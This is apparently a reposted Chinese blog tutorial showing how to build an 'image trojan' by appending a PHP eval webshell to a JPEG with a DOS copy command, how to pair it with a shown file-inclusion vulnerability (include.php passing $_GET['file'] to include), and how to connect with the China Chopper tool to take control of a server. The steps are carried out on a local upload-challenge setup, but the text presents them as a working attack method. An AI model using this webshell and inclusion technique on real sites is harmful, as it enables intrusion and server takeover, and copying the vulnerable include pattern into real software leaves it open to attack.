关于图片马的正确用法

有图片,有木马,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。

blob.png

我们先看一下源码吧,过关方式也是叫我们上传图片马。。。

然后我还要说吗一下,图片马不是一张木马图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢

001.png

一:准备图片马

需要用到DOS指令

Bash

copy 001.jpeg/b + test.php/a 2.jpg

这个指令的意思是,把001.jpeg和test.php合并到一起。很明显test.php就是webshell了

那么test.php里面的代码

PHP

<?php eval($_POST['yuer']); ?>

很明显,那个yuer就是我们的webshell密码。你可以改成你自己需要的。。。

然后打开CMD,切换到指定目录,合成之前是没有2.jpg的

blob.png

blob.png

blob.png

好的就会多出一个2.jpg...这就是图片马。

blob.png

二:准备好我们的文件包含漏洞

文件有包含漏洞的php文件include.php,代码如下

PHP

<?php
$file = $_GET['file'];
include $file;
?>

这便是最简单的文件包含漏洞代码,那么这个漏洞是必须服务器端自带的,也就是说如果你要攻击的网站没有文件包含漏洞,图片马就是用不了的。

文件包含漏洞简单说就是,在这个include.php中需要引用其他应用程序,php中应用程序文件是.php也就是说,他本来想引用一个php文件,但是漏洞就是,他不会识别什么是php文件,只要是他引用的,他都当php来解析,所以如果他引用的是jpg,但是jpg中有图片马,那么他就相当于引用了图片马,同样的道理还会有zip马等等

blob.png

这个具有文件包含漏洞的文件在这里。

三:上传图片马

blob.png

blob.png

blob.png成功上传图片马

然后我们先正常访问一下这个图片吧,因为我是本地搭建的服务器,所以我知道路径在哪里

blob.png

可以看到图片是非常正常的,完全看不出有木马。

好,我们再用文件包含去访问一次这个图片,文件包含include.php在根目录里,然后呢.

blob.png

四:菜刀链接

这一步就比较经典了,你必须把图片用,包含漏洞的链接去连接

blob.png

然后呢,点击添加。。。再右键点击文件管理。。。

blob.png

blob.png

成功拿到webshell

猜你喜欢

转载自blog.csdn.net/qq_42311391/article/details/89477993